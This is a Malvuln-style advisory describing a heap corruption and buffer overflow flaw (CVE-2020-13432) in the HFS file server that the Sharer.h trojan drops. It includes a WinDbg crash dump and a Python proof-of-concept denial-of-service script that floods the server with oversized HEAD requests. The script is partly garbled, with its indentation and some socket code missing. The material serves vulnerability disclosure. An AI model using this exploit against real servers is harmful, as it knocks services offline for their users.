Trojan.Win32.Sharer.h Buffer Overflow / Denial Of Service / Heap Corruption

Trojan.Win32.Sharer.h malware suffers from buffer overflow, denial of service, and heap corruption vulnerabilities.

MD5 | 46c6973ce9b92bed3583a9cf27f2d773

Discovery / credits: Malvuln - (c) 2021
Original source:
Contact: [email protected]

Threat: Trojan.Win32.Sharer.h
Vulnerability: Known Vulnerable Component - Heap Corruption
Description: Sharer.h by GOLDSWORD - can run several types of services, one is a third-party component named "HFS HTTP File Server" that listens on TCP port 80. The HFS server seems to be a pirated version of the original by as the properties of the executable read "Copyright DAOKERS.CN" This can be confirmed by running the EXE against strings util where we find "Http File Server -" value or simply using the menu about feature when running. This file server has a known remote buffer overflow vulnerability CVE-2020-13432 which I myself discovered (hyp3rlinx) last year that targeted v2.3m. However, after testing this version of the server it is also vulnerable to a remote heap corruption by sending specially crafted packets to the infected host. Running the malware you may get missing "picclp32.ocx" error just run it again and it should work.
Type: PE32
MD5: 9f80c3b1e7f5f6f7d0c8aea25fe83551
Vuln ID: MVID-2021-0160
Dropped files: hfs.exe
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 04/03/2021

Memory Dump:
(25f8.38a4): Access violation - code c0000005 (first/second chance not available)
eax=000a24b4 ebx=000a1150 ecx=028e0000 edx=00000002 esi=028e0000 edi=00000800
eip=770e2a0e esp=000a0f50 ebp=000a1100 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
770e2a0e 53 push ebx

0:000> !analyze -v
* *
* Exception Analysis *
* *

*** WARNING: Unable to verify checksum for hfs.exe
*** ERROR: Module load completed but symbols could not be loaded for hfs.exe
Failed calling InternetOpenUrl, GLE=12029

770e2a0e 53 push ebx

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 770e2a0e (ntdll!RtlpAllocateHeap+0x0000001e)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 000a0f4c
Attempt to write to address 000a0f4c


ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.




770e2a0e 53 push ebx




ADDITIONAL_DEBUG_TEXT: Enable Pageheap/AutoVerifer





LAST_CONTROL_TRANSFER: from 770e16b7 to 770e2a0e

000a1100 770e16b7 00000800 00000808 028e9050 ntdll!RtlpAllocateHeap+0x1e
000a1150 770e13ee 00000000 00000000 02997398 ntdll!RtlpAllocateHeapInternal+0x2b7
000a1168 7630190d 028e0000 00000000 00000800 ntdll!RtlAllocateHeap+0x3e
000a1180 7630110d 00000800 02997398 00000000 gdi32full!UspAllocCache+0x2d
000a11b0 76300f53 00000000 02997328 0401385b gdi32full!InitializeMetricBlock+0x4a
000a14d8 76300e89 00000000 00000040 00000024 gdi32full!LoadGlyphMetricsWithGetCharABCWidthsI+0x70
000a14f8 763001c4 00000024 00000001 000a1708 gdi32full!LoadGlyphMetrics+0x73
000a152c 762fcea3 0290d52c 00000006 0290d5c8 gdi32full!GetGlyphAdvanceWidths+0xd4
000a1558 762f9911 000a16e8 0290d52c 00000006 gdi32full!CUspShapingFont::GetGlyphDefaultAdvanceWidths+0x23
000a1644 762f9348 000a16f0 00000000 00000000 gdi32full!ShapingGetGlyphPositions+0x1e1
000a1788 762f6cb9 0401385b 0290d294 0290d52c gdi32full!ShlPlaceOT+0x218
000a1820 762f6596 00000000 000a18d0 0290d170 gdi32full!RenderItemNoFallback+0x409
000a1860 762f6448 00000000 000a18d0 00000000 gdi32full!RenderItemWithFallback+0x126
000a1888 762f61de 00000000 000a18d0 0290d270 gdi32full!RenderItem+0x28
000a18e0 762f3f84 0401385b 01800009 000010a2 gdi32full!ScriptStringAnalyzeGlyphs+0x1be
000a1d44 762f1596 0401385b 04b57f78 00000006 gdi32full!ScriptStringAnalyse+0x734
000a1efc 762f0db0 762f0d80 762f0d80 00000030 gdi32full!LpkCharsetDraw+0x626
000a1f28 76f36844 0401385b 00000000 00000000 gdi32full!LpkDrawTextEx+0x30
000a1f8c 76f36b38 00000000 04b57f78 00000006 user32!DT_DrawStr+0x72
000a1fec 76edd8fb 00000058 00002e50 000a2034 user32!DT_GetLineBreak+0xa2
000a20a4 76f214cd ffffffff 000a20f4 00002e50 user32!DrawTextExWorker+0x32b
000a2120 76f400be 02cf3490 00000000 00000032 user32!MB_CalcDialogSize+0x10c
000a2204 73ee39ec 000a2370 76f22093 000a2388 user32!SoftModalMessageBox+0x3ae
000a220c 76f22093 000a2388 04b57f78 00000000 win32u!NtUserModifyUserStartupInfoFlags+0xc
000a2450 6b0bf698 000218b0 0437c930 043bede8 user32!MessageBoxWorker+0x29a
000a2474 6b0c033c 000218b0 0437c930 043bede8 apphelp!MbHook_MessageBoxA+0x38
000a249c 00489f7b 000218b0 0437c930 043bede8 apphelp!SrHook_MessageBoxA+0x3c
WARNING: Stack unwind information not available. Following frames may be wrong.
000a2520 0048a093 00000010 000a42d4 0048a0b4 hfs+0x89f7b
000a2648 004bf174 004bf184 00000020 ffffffff hfs+0x8a093
000a2668 00489e49 0046b7b1 04292190 0438f460 hfs+0xbf174
000a267c 0046b7c0 00000000 6aa8ad67 043b26b0 hfs+0x89e49
000a42f4 00429f36 000000c2 00000000 043b2640 hfs+0x6b7c0
000a430c 76eee0bb 00031b30 000000c2 00000000 hfs+0x29f36
000a4338 76ef8849 02730e83 00031b30 000000c2 user32!_InternalCallWinProc+0x2b
000a435c 76efb145 000000c2 00000000 043b2640 user32!InternalCallWinProc+0x20
000a442c 76efa89c 02730e83 00000000 000000c2 user32!UserCallWinProcCheckWow+0x1be
000a4498 76edab54 02f9dee0 00000000 043b2640 user32!SendMessageWorker+0x6ff
000a44b8 00442016 00031b30 000000c2 00000000 user32!SendMessageA+0x54
000a44d8 00519853 000a4568 00519920 000a455c hfs+0x42016
000a455c 0051aa64 00000000 000a4618 0051ae77 hfs+0x119853
000a460c 0051d400 000a4660 000a467c 0051d41c hfs+0x11aa64
000a4660 004eda33 066cf540 000a4674 004ef995 hfs+0x11d400
000a466c 004ef995 000a46bc 004eee5e 000a46c4 hfs+0xeda33
000a4674 004eee5e 000a46c4 004ef0c2 000a46bc hfs+0xef995
000a46bc 004ef20c 000a46f4 004ef222 000a46dc hfs+0xeee5e
000a46dc 004c7c16 0671db40 0671db40 000a472c hfs+0xef20c
000a46ec 004c9680 000a476c 004c9cdb 000a472c hfs+0xc7c16
000a472c 004ca581 00000401 000a4c38 0671db01 hfs+0xc9680
000a4764 004c4727 000a4ba8 004c47d2 000a4b90 hfs+0xca581
000a4b90 004c4873 000a4c38 0671db40 000a4be8 hfs+0xc4727
000a4ba0 004c4b61 000a4bf0 004c4beb 000a4be8 hfs+0xc4873
000a4be8 004c364e 000a4d58 004c36e5 000a4c0c hfs+0xc4b61
000a4c0c 004ca0e0 00000401 009107b8 0671db40 hfs+0xc364e
000a4c24 004c3784 004c3730 009107b8 00000000 hfs+0xca0e0
000a4c48 76eee0bb 009107b8 00000401 00000388 hfs+0xc3784
000a4c74 76ef8849 004c3730 009107b8 00000401 user32!_InternalCallWinProc+0x2b
000a4c98 76efb145 00000401 00000388 00000001 user32!InternalCallWinProc+0x20
000a4d68 76ee90dc 004c3730 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
000a4dd4 76ee38c0 000a4df8 00489a13 000a4e00 user32!DispatchMessageWorker+0x4ac
000a4ddc 00489a13 000a4e00 0437c990 01000001 user32!DispatchMessageA+0x10
000a4df8 00489a3c 009107b8 00000401 00000388 hfs+0x89a13
000a4e20 0051150d 042e8b70 000a4fc0 00511ebc hfs+0x89a3c
000a4e2c 00511ebc 000a5018 000a4fcc 00512089 hfs+0x11150d
000a4fc0 00512255 000a5018 000a4fd8 00512281 hfs+0x111ebc
000a5018 00516989 00000000 00000001 ffffffff hfs+0x112255
000a5234 0051c787 000a5274 043b3510 000a52c4 hfs+0x116989
000a52b8 0051cf7a 000a530c 000a5328 0051d41c hfs+0x11c787
000a530c 004eda33 066cdd80 000a5320 004ef995 hfs+0x11cf7a
000a5318 004ef995 000a5368 004eee5e 000a5370 hfs+0xeda33
000a5320 004eee5e 000a5370 004ef0c2 000a5368 hfs+0xef995
000a5368 004ef20c 000a53a0 004ef222 000a5388 hfs+0xeee5e
000a5388 004c7c16 0671f070 0671f070 000a53d8 hfs+0xef20c
000a5398 004c9680 000a5418 004c9cdb 000a53d8 hfs+0xc7c16
000a53d8 004ca581 00000401 000a58e4 0671f001 hfs+0xc9680
000a5410 004c4727 000a5854 004c47d2 000a583c hfs+0xca581
000a583c 004c4873 000a58e4 0671f070 000a5894 hfs+0xc4727
000a584c 004c4b61 000a589c 004c4beb 000a5894 hfs+0xc4873
000a5894 004c364e 000a5a04 004c36e5 000a58b8 hfs+0xc4b61
000a58b8 004ca0e0 00000401 00c31614 0671f070 hfs+0xc364e
000a58d0 004c3784 004c3730 00c31614 00000000 hfs+0xca0e0
000a58f4 76eee0bb 00c31614 00000401 00000388 hfs+0xc3784
000a5920 76ef8849 004c3730 00c31614 00000401 user32!_InternalCallWinProc+0x2b
000a5944 76efb145 00000401 00000388 00000001 user32!InternalCallWinProc+0x20
000a5a14 76ee90dc 004c3730 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
000a5a80 76ee38c0 000a5aa4 00489a13 000a5aac user32!DispatchMessageWorker+0x4ac
000a5a88 00489a13 000a5aac 0437c990 01000001 user32!DispatchMessageA+0x10
000a5aa4 00489a3c 00c31614 00000401 00000388 hfs+0x89a13
000a5acc 0051150d 042e6e60 000a5c6c 00511ebc hfs+0x89a3c
000a5ad8 00511ebc 000a5cc4 000a5c78 00512089 hfs+0x11150d
000a5c6c 00512255 000a5cc4 000a5c84 00512281 hfs+0x111ebc
000a5cc4 00516989 00000000 00000001 ffffffff hfs+0x112255
000a5ee0 0051c787 000a5f20 043b3510 000a5f70 hfs+0x116989
000a5f64 0051cf7a 000a5fb8 000a5fd4 0051d41c hfs+0x11c787
000a5fb8 004eda33 066cf400 000a5fcc 004ef995 hfs+0x11cf7a
000a5fc4 004ef995 000a6014 004eee5e 000a601c hfs+0xeda33
000a5fcc 004eee5e 000a601c 004ef0c2 000a6014 hfs+0xef995
000a6014 004ef20c 000a604c 004ef222 000a6034 hfs+0xeee5e
000a6034 004c7c16 06717f70 06717f70 000a6084 hfs+0xef20c
000a6044 004c9680 000a60c4 004c9cdb 000a6084 hfs+0xc7c16
000a6084 004ca581 00000401 000a6590 06717f01 hfs+0xc9680
000a60bc 004c4727 000a6500 004c47d2 000a64e8 hfs+0xca581
000a64e8 004c4873 000a6590 06717f70 000a6540 hfs+0xc4727
000a64f8 004c4b61 000a6548 004c4beb 000a6540 hfs+0xc4873
000a6540 004c364e 000a66b0 004c36e5 000a6564 hfs+0xc4b61
000a6564 004ca0e0 00000401 005d1b4e 06717f70 hfs+0xc364e
000a657c 004c3784 004c3730 005d1b4e 00000000 hfs+0xca0e0
000a65a0 76eee0bb 005d1b4e 00000401 00000388 hfs+0xc3784
000a65cc 76ef8849 004c3730 005d1b4e 00000401 user32!_InternalCallWinProc+0x2b
000a65f0 76efb145 00000401 00000388 00000001 user32!InternalCallWinProc+0x20
000a66c0 76ee90dc 004c3730 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
000a672c 76ee38c0 000a6750 00489a13 000a6758 user32!DispatchMessageWorker+0x4ac
000a6734 00489a13 000a6758 0437c990 01000001 user32!DispatchMessageA+0x10
000a6750 00489a3c 005d1b4e 00000401 00000388 hfs+0x89a13
000a6778 0051150d 042e7c70 000a6918 00511ebc hfs+0x89a3c
000a6784 00511ebc 000a6970 000a6924 00512089 hfs+0x11150d
000a6918 00512255 000a6970 000a6930 00512281 hfs+0x111ebc
000a6970 00516989 00000000 00000001 ffffffff hfs+0x112255
000a6b8c 0051c787 000a6bcc 043b3510 000a6c1c hfs+0x116989
000a6c10 0051cf7a 000a6c64 000a6c80 0051d41c hfs+0x11c787
000a6c64 004eda33 066f49e0 000a6c78 004ef995 hfs+0x11cf7a
000a6c70 004ef995 000a6cc0 004eee5e 000a6cc8 hfs+0xeda33
000a6c78 004eee5e 000a6cc8 004ef0c2 000a6cc0 hfs+0xef995
000a6cc0 004ef20c 000a6cf8 004ef222 000a6ce0 hfs+0xeee5e
000a6ce0 004c7c16 0671cd20 0671cd20 000a6d30 hfs+0xef20c
000a6cf0 004c9680 000a6d70 004c9cdb 000a6d30 hfs+0xc7c16
000a6d30 004ca581 00000401 000a723c 0671cd01 hfs+0xc9680
000a6d68 004c4727 000a71ac 004c47d2 000a7194 hfs+0xca581
000a7194 004c4873 000a723c 0671cd20 000a71ec hfs+0xc4727
000a71a4 004c4b61 000a71f4 004c4beb 000a71ec hfs+0xc4873
000a71ec 004c364e 000a735c 004c36e5 000a7210 hfs+0xc4b61
000a7210 004ca0e0 00000401 00a619f8 0671cd20 hfs+0xc364e
000a7228 004c3784 004c3730 00a619f8 00000000 hfs+0xca0e0
000a724c 76eee0bb 00a619f8 00000401 00000384 hfs+0xc3784
000a7278 76ef8849 004c3730 00a619f8 00000401 user32!_InternalCallWinProc+0x2b
000a729c 76efb145 00000401 00000384 00000001 user32!InternalCallWinProc+0x20
000a736c 76ee90dc 004c3730 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
000a73d8 76ee38c0 000a73fc 00489a13 000a7404 user32!DispatchMessageWorker+0x4ac
000a73e0 00489a13 000a7404 0437c990 01000001 user32!DispatchMessageA+0x10
000a73fc 00489a3c 00a619f8 00000401 00000384 hfs+0x89a13
000a7424 0051150d 042e76d0 000a75c4 00511ebc hfs+0x89a3c
000a7430 00511ebc 000a761c 000a75d0 00512089 hfs+0x11150d
000a75c4 00512255 000a761c 000a75dc 00512281 hfs+0x111ebc
000a761c 00516989 00000000 00000001 ffffffff hfs+0x112255
000a7838 0051c787 000a7878 043b3510 000a78c8 hfs+0x116989
000a78bc 0051cf7a 000a7910 000a792c 0051d41c hfs+0x11c787
000a7910 004eda33 066f4b20 000a7924 004ef995 hfs+0x11cf7a
000a791c 004ef995 000a796c 004eee5e 000a7974 hfs+0xeda33
000a7924 004eee5e 000a7974 004ef0c2 000a796c hfs+0xef995
000a796c 004ef20c 000a79a4 004ef222 000a798c hfs+0xeee5e
000a798c 004c7c16 0671e960 0671e960 000a79dc hfs+0xef20c
000a799c 004c9680 000a7a1c 004c9cdb 000a79dc hfs+0xc7c16
000a79dc 004ca581 00000401 000a7ee8 0671e901 hfs+0xc9680
000a7a14 004c4727 000a7e58 004c47d2 000a7e40 hfs+0xca581
000a7e40 004c4873 000a7ee8 0671e960 000a7e98 hfs+0xc4727
000a7e50 004c4b61 000a7ea0 004c4beb 000a7e98 hfs+0xc4873
000a7e98 004c364e 000a8008 004c36e5 000a7ebc hfs+0xc4b61
000a7ebc 004ca0e0 00000401 009901d0 0671e960 hfs+0xc364e
000a7ed4 004c3784 004c3730 009901d0 00000000 hfs+0xca0e0
000a7ef8 76eee0bb 009901d0 00000401 00000384 hfs+0xc3784
000a7f24 76ef8849 004c3730 009901d0 00000401 user32!_InternalCallWinProc+0x2b
000a7f48 76efb145 00000401 00000384 00000001 user32!InternalCallWinProc+0x20
000a8018 76ee90dc 004c3730 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
000a8084 76ee38c0 000a80a8 00489a13 000a80b0 user32!DispatchMessageWorker+0x4ac
000a808c 00489a13 000a80b0 0437c990 01000001 user32!DispatchMessageA+0x10
000a80a8 00489a3c 009901d0 00000401 00000384 hfs+0x89a13
000a80d0 0051150d 042e7400 000a8270 00511ebc hfs+0x89a3c
000a80dc 00511ebc 000a82c8 000a827c 00512089 hfs+0x11150d
000a8270 00512255 000a82c8 000a8288 00512281 hfs+0x111ebc
000a82c8 00516989 00000000 00000001 ffffffff hfs+0x112255
000a84e4 0051c787 000a8524 043b3510 000a8574 hfs+0x116989
000a8568 0051cf7a 000a85bc 000a85d8 0051d41c hfs+0x11c787
000a85bc 004eda33 066f48a0 000a85d0 004ef995 hfs+0x11cf7a
000a85c8 004ef995 000a8618 004eee5e 000a8620 hfs+0xeda33
000a85d0 004eee5e 000a8620 004ef0c2 000a8618 hfs+0xef995
000a8618 004ef20c 000a8650 004ef222 000a8638 hfs+0xeee5e
000a8638 004c7c16 0671d430 0671d430 000a8688 hfs+0xef20c
000a8648 004c9680 000a86c8 004c9cdb 000a8688 hfs+0xc7c16
000a8688 004ca581 00000401 000a8b94 0671d401 hfs+0xc9680
000a86c0 004c4727 000a8b04 004c47d2 000a8aec hfs+0xca581
000a8aec 004c4873 000a8b94 0671d430 000a8b44 hfs+0xc4727
000a8afc 004c4b61 000a8b4c 004c4beb 000a8b44 hfs+0xc4873
000a8b44 004c364e 000a8cb4 004c36e5 000a8b68 hfs+0xc4b61
000a8b68 004ca0e0 00000401 00c60898 0671d430 hfs+0xc364e
000a8b80 004c3784 004c3730 00c60898 00000000 hfs+0xca0e0
000a8ba4 76eee0bb 00c60898 00000401 00000384 hfs+0xc3784
000a8bd0 76ef8849 004c3730 00c60898 00000401 user32!_InternalCallWinProc+0x2b
000a8bf4 76efb145 00000401 00000384 00000001 user32!InternalCallWinProc+0x20
000a8cc4 76ee90dc 004c3730 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be
000a8d30 76ee38c0 000a8d54 00489a13 000a8d5c user32!DispatchMessageWorker+0x4ac
000a8d38 00489a13 000a8d5c 0437c990 01000001 user32!DispatchMessage

SYMBOL_NAME: heap_corruption!heap_corruption


MODULE_NAME: heap_corruption

IMAGE_NAME: heap_corruption


STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb

FAILURE_BUCKET_ID: HEAP_CORRUPTION_c0000005_heap_corruption!heap_corruption


from socket import *
import time,sys

#HFS HTTP File Server v2.2a build 124 - 2.3m build 300.
#UPDATED CVE-2020-13432 exploit for v2.2a on 4/2/2021
#Heap Corruption - Buffer Overflow Dos
#Note: hfs.exe must have at least one saved virtual file or folder on the target
#test using a remote IP and not from the same machine.
#Discovery: hyp3rlinx
#ISR: ApparitionSec

def hfs_dos():

global ip,port,length,res,once,cnt,max_requests


length += 1
payload = "A"*length

##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n"
bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n"
if once==0:
res = s.recv(128)
if res != "":
print("Targets up please wait...\n")
if "HFS 2.3m" not in str(res) and "HFS 2.2a" not in str(res):
print("[!] Non vulnerable HFS version, exiting :(")
except Exception as e:
if e != None:
if str(e).find("timed out")!=-1:
if res=="":
print("[!] Target is not up or behind a firewall? :(")
print("[!] Done!")

if cnt == max_requests:
return False
return True

def msg():
print("CVE-2020-13432 HFS HTTP File Server v2.2a build 124 - 2.3m build 300.")
print("Unauthenticated Remote Buffer Overflow (DoS - PoC) updated 4/2/2021")
print("Virtual HFS saved file or folder required.")
print("Run from a different machine (IP) than the target.")
print("By Hyp3rlinx - ApparitionSec\n")

if __name__=="__main__":


if len(sys.argv) != 3:
print("Usage: <hfs.exe Server>, <Port (usually 8080)>")

ip = sys.argv[1]
port = int(sys.argv[2])


while True:
if not hfs_dos():
print("[!] Failed, non vuln version or no virtual files exist on the target server :(")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) (TM).

Related Posts